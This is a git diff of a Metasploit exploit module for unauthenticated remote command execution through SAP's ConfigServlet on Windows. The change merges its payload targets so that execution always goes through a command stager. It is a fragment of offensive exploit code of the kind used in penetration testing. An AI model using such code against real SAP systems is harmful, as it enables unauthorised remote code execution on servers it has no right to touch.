diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb index 93d69355ae..cfb8048c8b 100644 --- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb +++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb @@ -26,15 +26,9 @@ class Metasploit3 < Msf::Exploit 'Targets' => [ [ - 'Windows CMD (Use windows CMD payloads)', + 'Windows generic', { - 'Arch' => ARCH_CMD - } - ], - [ - 'Windows x86 (Execute binary payloads via uploaded VBS)', - { - 'Arch' => ARCH_X86 #badchars ,; + 'Arch' => ARCH_X86 } ] ], @@ -53,11 +47,7 @@ class Metasploit3 < Msf::Exploit print_status("#{rhost}:#{rport} - Exploiting remote system") uri = normalize_uri(target_uri.path, 'ConfigServlet') - if target['Arch'] == ARCH_CMD - send_evil_request(uri, payload.encoded) - else - execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri }) - end + execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri }) end def execute_command(cmd, opts)